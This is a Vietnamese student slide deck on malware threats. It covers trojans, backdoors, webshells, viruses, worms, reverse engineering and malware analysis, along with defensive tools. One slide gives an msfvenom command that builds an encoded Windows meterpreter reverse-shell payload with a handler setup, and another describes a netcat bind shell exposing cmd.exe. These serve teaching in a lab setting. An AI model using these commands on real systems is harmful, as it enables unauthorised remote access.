Add to collection(s) Add to saved
  1. No category
Uploaded by Kakuzu Long

slidebtlnhom7 (1)

advertisement 
MALWARE THREATS
Nhóm 7
Lại Đức Long
Bạch Hoàng Hạ
Nông Nguyễn Nguyên Phương
Cái Xuân Trung
Nguyễn Anh Tuấn
Malware
Malware hoặc phần mềm độc hại là
bất kỳ chương trình hoặc tệp nào có
hại cho người dùng máy tính.
Các chương trình độc hại này có thể
thực hiện nhiều chức năng: ăn cắp,
mã hóa hoặc xóa dữ liệu nhạy cảm,
thay đổi hoặc chiếm đoạt các chức
năng và giám sát hoạt động máy tính
của người dùng
01
BACKDOOR
&TROJAN
Backdoor
Backdoor hay còn gọi là “cổng sau” là
chương trình mà hacker cài đặt trên
máy tính của nạn nhân để có thể điều
khiển hay xâm nhập lại dễ dàng
Nhiệm vụ của Backdoor là lấy tin tức
của người đang sử dụng phần mềm,
sau đó thực hiện một số thao tác nào
đó như gửi thông tin lên server để lưu
trữ.
Webshell
WebShell là 1 dạng mã độc, backdoor
sở hữu nhiều các chức năng, giúp hỗ
trợ cho quá trình xâm nhập và chiếm
lấy quyền quản lý hệ thống các
website của các hacker.
Mã độc Webshell có thể được upload
lên website server sau đó điều khiển
và quản lý web đó từ xa.
Mặt lợi của backdoor
•
•
•
Kiểm tra version của các ứng
dụng
Xử lý bản quyền
Một số website tích hợp
backdoor để thiết lập cấu hình
chỉ dành riêng cho khách hàng
đó
Mặt hại của backdoor
•
•
•
Sử dụng backdoor để cài các
phần mềm độc hại
Thu thập thông tin về bạn, các
trang web bạn truy cập trên
Internet, những thứ bạn tải
xuống, tệp bạn mở, tên người
dùng, mật khẩu và bất kỳ thứ gì
khác có giá trị.
Sử dụng máy tính nạn nhân
trong 1 cuộc tấn công DDOS
Trojan là gì ?
Trojan
Trojan là một loại phần mềm độc hại
thường được ngụy trang dưới dạng
phần mềm hợp pháp. Trojan có thể
được sử dụng bởi những kẻ trộm
mạng và tin tặc cố gắng truy cập vào
hệ thống của người dùng
Khi xâm nhập vào máy tính của bạn,
vi-rút Trojan hoạt động tương tự - nó
ẩn bên trong các chương trình dường
như vô hại hoặc cố gắng lừa bạn tải
xuống
MỤC ĐÍCH CỦA TROJAN
CÁCH NHẬN BIẾT CUỘC
TẤN CÔNG BẰNG TROJAN
•
•
•
•
•
•
•
•
Trình duyệt của máy tính chuyển hướng đến những trang không rõ.
Trình Anti-Virus bị vô hiệu hóa hoặc thuộc tính của nó không hoạt động.
Tài khoản và mật khẩu bị thay đổi hoặc không chứng thực được.
Hình nền và background thay đổi.
Xuất hiện các báo cáo mua lạ trong thẻ tín dụng của mình.
Ổ CD-ROM mở và đóng bởi nó.
Thanh Taskbar biến mất.
Cửa sổ thiết lập màu sắc bị thay đổi.
CÁC CỔNG PHỔ BIẾN ĐƯỢC
SỬ DỤNG BỞI TROJAN
Sử dụng Kali Linux dùng để tấn
công Win 10 bằng Metaploit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.128
LPORT=5555 -f exe -e x86/shikata_ga_nai -i 10 > application.exe
Sử dụng exploit(multi/handler) và payload
windows/meterpreter/reverse_tcp để nghe ngóng
Thiết lập các thông số yêu cầu
Sử dụng lệnh search –f *.txt
Qúa trình xâm nhập
của Trojan
Qúa trình xâm nhập của Trojan được thực hiện bởi một số bước. Các bước này
được hacker sử dụng để xâm nhiễm hệ thống mục tiêu:
B1: Tạo Trojan sử dụng Trojan Construction Toolkit.
B2: Tạo Dropper
B3: Tạo Wrapper
B4: Truyền nhiễm Trojan
B5: Kích hoạt Trojan
Sự triển khai của Trojan
07
Các loại Trojan
Enter a sbtitle here if you need it
Một số loại Trojan phổ biến:
- Command Shell Trojan
- Defacement Trojan
- HTTP/ HTTPS Trojan
- Botnet Trojan
- Trojan-Proxy Server
- Remote Access Trojan
- Data-Sending Trojan
- Destructive Trojan
- Security software disabler
Trojan
- FTP Trojan
08
Netcat
Enter a sbtitle here if you need it
Netcat là một trojan dạng dòng lệnh nhưng khá mạnh mẽ và dễ sử dụng. Trước đây,
Netcat được xem như một công cụ “sạch” nhưng do bị các hacker sử dụng nhiều
vào các mục tiêu không trong sáng nên hiện nay hầu hết chương trình phòng chống
virus đều đưa Netcat vào danh sách đen. Công cụ này có khả năng mở những cổng
TCP hay UDP trên máy tính bị nhiễm, và hacker sử dụng chương trình telnet để kết
nối tới các cổng đã mở 8 và thực hiện nhiều thao tác nguy hiểm như truyền file, thực
thi lệnh. Netcat có thể chạy trên hệ thống Windows cũng như Linux, tương tác theo
mô hình client / server:
Các tính năng ban đầu của netcat bao gồm:
- Kết nối đi hoặc đến, TCP hoặc UDP, đến hoặc từ
bất kỳ cổng nào
- Kiểm tra toàn bộ chuyển tiếp / đảo ngược DNS ,
với các cảnh báo thích hợp
- Khả năng sử dụng bất kỳ cổng nguồn cục bộ nào
- Khả năng sử dụng bất kỳ địa chỉ nguồn mạng
nào được cấu hình cục bộ
- Khả năng quét cổng tích hợp, với tính năng ngẫu
nhiên
- Tích hợp khả năng định tuyến nguồn rời
- Có thể đọc các đối số dòng lệnh từ đầu vào
chuẩn
- Chế độ gửi chậm, một dòng sau mỗi N giây
- Kết xuất hex của dữ liệu đã truyền và đã nhận
- Khả năng tùy chọn để cho phép một dịch vụ
chương trình khác thiết lập kết nối
- Người trả lời tùy chọn -options telnet
Demo Netcat
Trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e cmd.exe
Trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng
đã định, chẳng hạn như 8080
Thế nào là “Wrapping” ?
Thế nào là “Wrapping” ?
●
●
●
Wrapper là một gói phần mềm được sử dụng để đính kèm Tronjan.
Thông thường, game và những chương trình có tính hấp dẫn (phim s*x) được
sử dụng là wrapper.
Để có thế phát tán các mã độc hay trojan / backdoor hacker thường đính kèm
những công cụ này vào những công cụ hợp lệ khác
Những công cụ đóng gói trojan :
1
2
3
Graffiti
Silk Rope 2000
EliTeWrap
4
IconPlus
5
AutoIT
Trojan
Construction Kit
và Trojan Maker
Trojan Construction Kit và Trojan Maker
●
●
Trojan construction kit va trojan maker là những công cụ mà các hacker dùng
để t75 tạo ra các biến thể trojan / backdoor nguy hiểm của riêng mình
Một số công cụ dùng để tạo trojan như Senna Spy Generator, Trojan Horse
Construction Kit, Pandora’s Box
Phòng Chống
Trojan
Phòng Chống Trojan
●
●
Hiện nay có nhiều công cụ thương mại của phần mềm chống Virus, cũng như
phát hiện các loại spyware, trojan, backdor và mã độc hại khác
Điểm chính trong cơ chế hoạt động của Trojan và Backdor là cài đặt một
chương trình trên máy tính. Vì thế cách tốt nhất để tránh nhiệm trojan là không
nên cho phép user bình thường có được quyền cài đặt chương trình tùy ý
Các khuyến cáo để phòng chống Trojan hiệu quả :
●
●
Hạn chế sử dụng chung máy tính, cài đặt mật khẩu bảo vệ.
Không mở các tập tin lạ không rõ nguồn gốc, chú ý các file có đuôi mở rộng:
exe, bat,com,…
●
Không vào các trang web lạ, không click vào các đường link lạ.
●
Không cài đặt các phần mềm lạ.
●
●
Quét các port đang mở, các tiến trình đang chạy, những thay đổi với Registry,
những hoạt động mạng, …
Chạy các phần mềm diệt Trojan.
Những Công Cụ
Giám Sát Port Và
Dò Tìm Trojan
Fport
●
Công cụ miễn phí của
Foundstone báo cáo về
tình trạng của tất cả các
cổng TCP / UDP đang mở
cùng với dịch vụ tương
ứng hoạt động trên những
cổng này.
TCP View
●
Chương trình hoạt động
trên hệ điều hành
Windows hiển thị chi tiết
các điểm đầu cuối tham
gia truyền thông trên TCP /
UDP
TCP View
TCP View
TCP View
TCP View
Process Viewer
●
Là ứng dụng dùng để giám
sát các tiến trình đang hoạt
động, đây là công cụ dạng
dòng lệnh rất hay, có khả
năng kill (đóng) các tiến trình
nguy hiểm.
Currport
●
Currport liệt kê tất cả các
cổng TCP/IP và UDP đang
mở trên máy tính của bạn.
Với mỗi cổng trong danh
sách.
Những Công Cụ Giám Sát Port Và Dò Tìm Trojan
●
Inzider : Là một ứng dụng
hữu ích liệt kê những tiến
trình đang hoạt động trên
hệ thống Windows và các
cổng tương ứng.
●
Tripwire : Ứng dụng trên
Linux dùng để kiểm tra tính
toàn vẹn của hệ thống tập
tin.
Phòng Chống
Trojan Bằng
Cách Kiểm Tra
Tính Toàn Vẹn
Của tập Tin
Windows File Protection
●
WFP kiểm tra tính toàn vẹn
của tập tin khi có sự tác
động đến các tập tin SYS,
DLL, OCX, TTF hay EXE
Virus và Worm
Tổng quan chung
về virus
Giới thiệu về virus
●
Virus máy tính là một chương trình máy tính có khả năng tự sao
chép chính nó từ đối tượng lây nhiễm này sang đối tượng lây nhiễm
khác.
Virus máy tính lây lan như thế nào ?
●
Virus máy tính có thể lây lan vào máy tính qua email, qua các file tải về từ
Internet hay copy từ máy khác về, và cũng có thể lợi dụng các lỗ hổng phần
mềm để xâm nhập từ xa, cài đặt lây nhiễm lên máy tính một cách âm thầm
Virus máy tính phá hoại những gì ?
● Dù ít hay nhiều thì virus cũng được sinh ra để phục vụ những mục đích
không tốt. Các virus thế hệ đầu tiên có thể tàn phá nặng nề dữ liệu, ổ đĩa,
hệ thống, hoặc đơn giản hơn chỉ là làm cho màn hình bị lỗi hiển thị với
nhiều nhân bản để “ghi điểm”. Tuy nhiên thì các virus như vậy hầu như
không còn tồn tại nữa . Các virus ngày nay thường phục vụ cho những
mục đích về kinh tế hoặc phá hoại cụ thể
Dấu hiệu nhận biết khi máy tính bị nhiễm virus ?
●
Truy xuất tập tin, mở các chương trình ứng dụng chậm.
●
Khi duyệt web có các trang lạ xuất hiện
●
Duyệt web chậm, nội dung các trang web hiển thị lên màn
hình chậm
●
Góc phải màn hình xuất hiện cảnh báo : “Your computer is
infected” hoặc xuất hiện cửa sổ : “Virus Alert”
● Các file lạ tự động sinh ra khi mở ổ đĩa USB
● Xuất hiện các file có phần mở rộng .exe với tên trùng với tên các
thư mục
Sự khác biệt giữa
virus và worm
Virus
●
●
Có khả năng lây lan (sao
Worm
●
Có khả năng lây lan (sao
chép từ máy tính này sang
chép từ máy tính này sang
máy tính khác
máy tính khác
Lây nhiễm qua tệp
●
Lây nhiễm qua mạng
Phân loại virus
●
Một virus máy tính có thể lây nhiễm vào các thành phần sau đây của
hệ thống

System sector

Tập tin

Macros (Như MS Word macro)

Các tập tin hay hàm thư viên của hệ thống như DLL,INI

Disk cluster

Tập tin BAT

Mã nguồn ứng dụng
Các loại virus được phân chia theo cách thức lây lan :
●
Polymorphic
●
Cavity (space-filler)
●
Stealth
●
Tunneling
●
Fast & Slow Infector
●
Camouflage
●
Armored
●
NTFS & Active Directory
●
Multipartie
Cách phòng chống
và ngăn chạn tác
hại của virus máy
tính
Cách phòng chống và ngăn chạn tác hại của virus máy tính
a) Sử dụng phần mềm diệt virus máy tính
b) Sử dụng tường lửa cá nhân
c) Cập nhật các bản vá lỗi của hệ điều hành
d) Theo kinh nghiệm sử dụng máy tính
REVERSE
ENGINEERING
REVERSE ENGINEERING LÀ GÌ
● RE là quá trình tìm hiểu những công nghệ được sử dụng bởi 1 thiết bị, 1
đối tượng hoặc 1 hệ thống thông qua việc phân tích cấu trúc, các chức
năng và hoạt động của nó.
● RE là 1 khái niệm rất rộng, bao gồm cả RE phần cứng và RE phần mềm
● Việc phân tích hoạt động cụ thể của một hệ thống hay 1 chương trình sẽ
được sử dụng trong việc bảo trì chính hệ thống hay chương trình đó
ỨNG DỤNG CỦA RE
● Phân tích malware
● Tìm hiểu cách thức hoạt động của một modul hoặc một hệ thống
CÁC VẤN ĐỀ CHÍNH CỦA RE
● Với mỗi một nền tảng, hệ điều hành khác nhau ta có các chương trình
được xây dựng khác nhau, thực thi theo cách khác nhau
● Với đặc trưng của mỗi nền tảng, ta có những hướng khác nhau để tiếp
cận, những công cụ khác nhau để trợ giúp cho công việc.
● Với các hệ điều hành khác nhau ta sử dụng những công cụ khác nhau
● Những chương trình viết bằng ngôn ngữ khác nhau sẽ có những công cụ
RE khác nhau
MALWARE
ANALYSIS
KHÁI QUÁT
● Là quá trình xác định phần mềm độc hại cho đến khi xác minh rằng phần
mềm độc hại đã bị loại bỏ hoàn toàn
● Mục tiêu: thu được thông tin chi tiết và quan sát hành vi của phần mềm
độc hại
QUÁ TRÌNH
● Preparing the Testbed
Chuyên gia bảo mật chuẩn bị
sẵn máy ảo như một hệ điều hành máy
chủ, nơi phân tích phần mềm độc hại
động sẽ được thực hiện bằng cách
thực thi phần mềm độc hại trên hệ
điều hành khách. Hệ điều hành máy
chủ này được cách ly khỏi mạng khác
để quan sát hành vi của phần mềm
độc hại bằng cách cách ly phần mềm
độc hại khỏi mạng.
QUÁ TRÌNH
● Phân tích tĩnh
Được thực hiện bằng cách phân
mảnh tài nguyên của tệp nhị phân mà
không thực thi nó và nghiên cứu từng
thành phần. Trình tháo gỡ như IDA được
sử dụng để tháo rời tệp nhị phân.
● Phân tích động
Được thực hiện bằng cách thực
thi phần mềm độc hại trên máy chủ và
quan sát hành vi của phần mềm độc hại
trong môi trường Sandbox
MỤC TIÊU
● Chẩn đoán mức độ nghiêm trọng của mối đe dọa hoặc mức độ tấn công.
● Chẩn đoán loại Phần mềm độc hại.
● Phạm vi tấn công
● Phòng thủ được xây dựng để bảo mật hệ thống và mạng của tổ chức.
● Tìm ra nguyên nhân gốc rễ.
● Đã xây dựng các hành động ứng phó Sự cố.
● Phát triển Anti-malware để loại bỏ.
SHEEP DIPPING
● Là quá trình phân tích tệp và gói tin bị nghi
●
●
ngờ chống lại vi-rút và phần mềm độc hại
trước khi cho phép chúng có sẵn cho người
dùng trong một môi trường bị cô lập
Quá trình phân tích này được thực hiện trên
một máy tính chuyên dụng. Đây là tuyến
phòng thủ ban đầu đang chạy, với tính toán
được bảo mật cao cùng với giám sát cổng,
giám sát tệp, chống vi-rút và các chương trình
bảo mật khác.
Hệ thống nhúng cừu có thể được coi là một
trường hợp đặc biệt của hộp cát , được sử
dụng để kiểm tra phần mềm độc hại.
DEMO
Download
advertisement